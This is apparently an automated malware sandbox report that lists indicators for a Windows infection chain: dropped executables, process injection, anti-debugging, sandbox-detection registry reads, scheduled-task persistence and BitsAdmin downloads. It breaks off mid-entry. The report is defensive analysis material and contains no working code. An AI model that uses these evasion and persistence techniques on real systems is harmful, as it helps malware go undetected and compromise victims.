installer.exemsiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\W: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 174 ipinfo.io 233 ipinfo.io 362 ipinfo.io 971 ipinfo.io 43 ipinfo.io 4 ipinfo.io 4 api.db-ip.com 44 ipinfo.io 47 api.db-ip.com 48 api.db-ip.com 180 ipinfo.io 231 ipinfo.io 4 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
fpnxpWGlulH21GfBlEce4NmL.exedescription ioc process File created C:\Windows\SysWOW64\MP4SDECD\088424020bedd6b28ac7fd22ee35dcd7322895ce fpnxpWGlulH21GfBlEce4NmL.exe File created C:\Windows\SysWOW64\MP4SDECD\conhost.exe fpnxpWGlulH21GfBlEce4NmL.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
Processes:
6592176.exex5yjjKUdFt2OAlDQL7_fYMPj.exe0COn9mQq2c06dY1_MSTZTeAr.exe8474982.exekFymlZ9bOtriLI_9SMXatxO1.exedjOzqaDxuN4ftzSDioAOukfA.exefpnxpWGlulH21GfBlEce4NmL.exe1371155.exe8884366.exe7383269.exeCompPkgSrv.exe7C9F.exesmss.exe5795695.exepid process 6108 6592176.exe 4844 x5yjjKUdFt2OAlDQL7_fYMPj.exe 4044 0COn9mQq2c06dY1_MSTZTeAr.exe 2168 8474982.exe 4252 kFymlZ9bOtriLI_9SMXatxO1.exe 2228 djOzqaDxuN4ftzSDioAOukfA.exe 3276 fpnxpWGlulH21GfBlEce4NmL.exe 4156 1371155.exe 1204 8884366.exe 5852 7383269.exe 4708 CompPkgSrv.exe 6064 7C9F.exe 7960 smss.exe 5692 5795695.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
Fri05f84fa77402bf.exeFri053f5694ea31c9a.exeFri05a277b9a3d2.exevZtRm6RPNwcqvnanVev4uQep.exeusXF9zucDbMhT_78yRVLnT_L.exejTpJDXJu0rO2dvjCK2d8f8y3.exeaDpjh1ksoewfrV4qxYgfCwyx.exeYwfX9VEMCM0I8tKzQEPvHqNf.exe84B1.exeMcdwmM9yiVXViMdMLT2CYjKO.exe173C.exedescription pid process target process PID 5036 set thread context of 5512 5036 Fri05f84fa77402bf.exe Fri05f84fa77402bf.exe PID 3304 set thread context of 5528 3304 Fri053f5694ea31c9a.exe Fri053f5694ea31c9a.exe PID 420 set thread context of 5520 420 Fri05a277b9a3d2.exe Fri05a277b9a3d2.exe PID 6008 set thread context of 6472 6008 vZtRm6RPNwcqvnanVev4uQep.exe vZtRm6RPNwcqvnanVev4uQep.exe PID 5700 set thread context of 6708 5700 usXF9zucDbMhT_78yRVLnT_L.exe usXF9zucDbMhT_78yRVLnT_L.exe PID 3440 set thread context of 6732 3440 jTpJDXJu0rO2dvjCK2d8f8y3.exe jTpJDXJu0rO2dvjCK2d8f8y3.exe PID 3832 set thread context of 6476 3832 aDpjh1ksoewfrV4qxYgfCwyx.exe aDpjh1ksoewfrV4qxYgfCwyx.exe PID 6324 set thread context of 5912 6324 YwfX9VEMCM0I8tKzQEPvHqNf.exe YwfX9VEMCM0I8tKzQEPvHqNf.exe PID 5884 set thread context of 7416 5884 84B1.exe 84B1.exe PID 6164 set thread context of 7976 6164 McdwmM9yiVXViMdMLT2CYjKO.exe McdwmM9yiVXViMdMLT2CYjKO.exe PID 7864 set thread context of 4540 7864 173C.exe AppLaunch.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exeautosubplayer.exedescription ioc process File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\libvlccore.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\libvlccore.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\error_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\spu\liblogo_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Audio-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\libvlc.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\libssp-0.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\offset_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\regstr autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png autosubplayer.exe -
Drops file in Windows directory 39 IoCs
Processes:
svchost.exe4BqjvA9G3qh1x_0g7cfYqK0k.exemsiexec.exeMsiExec.exekPBhgOaGQk.exe6fDHT2tUxULVjUTvpyzQ9uGY.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File created C:\Windows\System\svchost.exe 4BqjvA9G3qh1x_0g7cfYqK0k.exe File opened for modification C:\Windows\Installer\MSIF701.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1D5A.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp kPBhgOaGQk.exe File created C:\Windows\Installer\f79926a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI897.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2954.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\System\svchost.exe 4BqjvA9G3qh1x_0g7cfYqK0k.exe File opened for modification C:\Windows\Installer\MSI1A2D.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFDE07AA4477C3D5AB.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFF766C3EB336FB834.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSID14F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI102D.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFA1777CD7B793685E.TMP msiexec.exe File created C:\Windows\System\svchost.exe 6fDHT2tUxULVjUTvpyzQ9uGY.exe File opened for modification C:\Windows\Installer\f79926a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI104.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC94E.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFE570C9FEF1B5F729.TMP msiexec.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File created C:\Windows\System\xxx1.bak 6fDHT2tUxULVjUTvpyzQ9uGY.exe File opened for modification C:\Windows\Installer\MSI10B6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2EA4.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\Installer\MSIC030.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB18E.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\System\xxx1.bak 4BqjvA9G3qh1x_0g7cfYqK0k.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIBA1A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID12E.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\Installer\MSIA2D7.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3844 3564 WerFault.exe Fri0541e16ce794d258f.exe 5700 2292 WerFault.exe Fri055cc2a6e65.exe 5888 5556 WerFault.exe rundll32.exe 6240 5740 WerFault.exe 7036 5772 WerFault.exe 7028 4208 WerFault.exe tPwENUt61mkw9jaaKJZITT4q.exe 5892 6732 WerFault.exe 6684 5536 WerFault.exe 7KwyEbC_NANhTQEeLeSH13jc.exe 6912 3948 WerFault.exe Jj7boAeoG56W1zy74ULeu0nk.exe 2896 6708 WerFault.exe usXF9zucDbMhT_78yRVLnT_L.exe 7568 3060 WerFault.exe SEdbjWMsrv726vIkSIBsE9Go.exe 8120 7256 WerFault.exe Fmj0Lz0Ez3X0ixz2HwOQLRlN.exe 8096 1332 WerFault.exe d6sHYV6XlWgpQzAIDX6Lbn0g.exe 8040 7248 WerFault.exe B4y_EASV2PYiiQ2KLAuWbSfl.exe 5184 3716 WerFault.exe 6xMN6qpuEr9zi2l7O2Z_5f9r.exe 3860 7120 WerFault.exe rundll32.exe 5144 3240 WerFault.exe rundll32.exe 1464 6436 WerFault.exe 96DF.exe 7452 7864 WerFault.exe 173C.exe 2040 19192 WerFault.exe GcleanerEU.exe 7008 3956 WerFault.exe gcleaner.exe 7836 2012 WerFault.exe GcleanerEU.exe 6992 2108 WerFault.exe rundll32.exe 9036 8828 WerFault.exe gcleaner.exe 9220 9112 WerFault.exe rundll32.exe 11212 10680 WerFault.exe GcleanerEU.exe 13224 12672 WerFault.exe gcleaner.exe 13708 13592 WerFault.exe rundll32.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exevZtRm6RPNwcqvnanVev4uQep.exe84B1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vZtRm6RPNwcqvnanVev4uQep.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 84B1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 84B1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vZtRm6RPNwcqvnanVev4uQep.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vZtRm6RPNwcqvnanVev4uQep.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 84B1.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeusXF9zucDbMhT_78yRVLnT_L.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exekPBhgOaGQk.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz usXF9zucDbMhT_78yRVLnT_L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString usXF9zucDbMhT_78yRVLnT_L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString kPBhgOaGQk.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision cmd.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6612 schtasks.exe 2288 schtasks.exe 2544 schtasks.exe 2420 schtasks.exe 7748 schtasks.exe 7884 schtasks.exe 2424 schtasks.exe 6992 schtasks.exe 7272 schtasks.exe 4820 schtasks.exe 7608 schtasks.exe 5760 schtasks.exe 1284 schtasks.exe 2996 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5940 timeout.exe -
Download via BitsAdmin 1 TTPs 3 IoCs
Processes:
bitsadmin.exebitsadmin.exebitsadmin.exepid process 5612 bitsadmin.exe 5360 bitsadmin.exe 8480 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 59 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeusXF9zucDbMhT_78yRVLnT_L.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exekPBhgOaGQk.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried 